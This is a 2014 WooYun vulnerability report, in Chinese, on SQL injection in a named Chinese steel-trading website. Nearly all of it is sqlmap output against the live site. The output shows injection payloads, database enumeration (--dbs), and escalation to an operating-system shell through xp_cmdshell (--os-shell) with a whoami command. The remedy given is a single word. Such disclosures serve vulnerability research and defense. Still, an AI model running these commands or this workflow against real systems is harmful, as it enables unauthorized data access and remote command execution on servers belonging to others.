漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2014-077429
漏洞标题:中国钢铁现货网#严重漏洞一枚
相关厂商:钢铁现货网
漏洞作者: 爱上平顶山
提交时间:2014-09-26 16:57
修复时间:2014-11-10 16:58
公开时间:2014-11-10 16:58
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:未联系到厂商或者厂商积极忽略
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2014-09-26: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-11-10: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
0.0
拉手网专场,看来看去,我擦,没有一家招聘安全岗的~
详细说明:
中国钢铁现货网
点:http://baike.gtxh.com/gtbk.aspx?mid=9c71fe4a9321440483adb38cd2ee8aca
sqlmap identified the following injection points with a total of 166 HTTP(s) requests:
---
Place: GET
Parameter: mid
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: mid=9c71fe4a9321440483adb38cd2ee8aca'; WAITFOR DELAY '0:0:5';--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: mid=9c71fe4a9321440483adb38cd2ee8aca' WAITFOR DELAY '0:0:5'--
---
[14:51:39] [INFO] testing MySQL
[14:51:39] [WARNING] it is very important not to stress the network adapter's bandwidth
during usage of time-based queries
[14:51:39] [WARNING] the back-end DBMS is not MySQL
[14:51:39] [INFO] testing Oracle
[14:51:40] [WARNING] the back-end DBMS is not Oracle
[14:51:40] [INFO] testing PostgreSQL
[14:51:40] [WARNING] the back-end DBMS is not PostgreSQL
[14:51:40] [INFO] testing Microsoft SQL Server
[14:51:50] [INFO] confirming Microsoft SQL Server
[14:52:10] [INFO] adjusting time delay to 3 seconds due to good response times
[14:52:16] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
[14:52:16] [INFO] fetched data logged to text files under 'D:\SqlMap?Python?\Bin\output\
baike.gtxh.com'
[*] shutting down at 14:52:16
D:\SqlMap免Python版\Bin>Sqlmap.exe -u "http://baike.gtxh.com/gtbk.aspx?mid=9c71fe4a93214
40483adb38cd2ee8aca" --dbs
[*] starting at 14:52:27
[14:52:28] [INFO] resuming back-end DBMS 'microsoft sql server'
[14:52:28] [INFO] testing connection to the target url
sqlmap got a 302 redirect to 'http://baike.gtxh.com:80/Html/gtbk_9c71f.html'. Do you wan
t to follow? [Y/n] n
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: mid
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: mid=9c71fe4a9321440483adb38cd2ee8aca'; WAITFOR DELAY '0:0:5';--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: mid=9c71fe4a9321440483adb38cd2ee8aca' WAITFOR DELAY '0:0:5'--
---
[14:52:29] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
[14:52:29] [INFO] fetching database names
[14:52:29] [INFO] fetching number of databases
[14:52:30] [WARNING] time-based comparison needs larger statistical model. Making a few
dummy requests, please wait..
[14:52:31] [WARNING] it is very important not to stress the network adapter's bandwidth
during usage of time-based queries
2
[14:53:03] [INFO] adjusting time delay to 1 second due to good response times
0
[14:53:06] [INFO] retrieved: dh
[14:53:28] [INFO] retrieved: gtxh_Analysts
.
.
.
等等,一共20个数据库~
慢 就不跑了。
D:\SqlMap免Python版\Bin>Sqlmap.exe -u "http://baike.gtxh.com/gtbk.aspx?mid=9c71fe4a93214
40483adb38cd2ee8aca" --os-shell
[*] starting at 15:27:41
[15:27:42] [INFO] resuming back-end DBMS 'microsoft sql server'
[15:27:45] [INFO] testing connection to the target url
sqlmap got a 302 redirect to 'http://baike.gtxh.com:80/Html/gtbk_9c71f.html'. Do you wan
t to follow? [Y/n] n
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: mid
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: mid=9c71fe4a9321440483adb38cd2ee8aca'; WAITFOR DELAY '0:0:5';--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: mid=9c71fe4a9321440483adb38cd2ee8aca' WAITFOR DELAY '0:0:5'--
---
[15:28:08] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
[15:28:08] [INFO] fingerprinting the back-end DBMS operating system version and service
pack
[15:28:08] [WARNING] time-based comparison needs larger statistical model. Making a few
dummy requests, please wait..
[15:30:45] [WARNING] it is very important not to stress the network adapter's bandwidth
during usage of time-based queries
[15:33:02] [WARNING] unable to fingerprint the underlying operating system version, assu
ming it is Windows 2003 Service Pack 2
[15:33:08] [INFO] testing if current user is DBA
[15:33:38] [INFO] checking if xp_cmdshell extended procedure is available, please wait..
[15:34:02] [INFO] adjusting time delay to 4 seconds due to good response times
[15:34:02] [INFO] xp_cmdshell extended procedure is available
[15:34:33] [INFO] testing if xp_cmdshell extended procedure is usable
[15:35:49] [INFO] going to use xp_cmdshell extended procedure for operating system comma
nd execution
[15:35:49] [INFO] calling Windows OS shell. To quit type 'x' or 'q' and press ENTER
os-shell> whoami
...
ok
漏洞证明:
如上
修复方案:
过滤~
版权声明:转载请注明来源 爱上平顶山@乌云
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝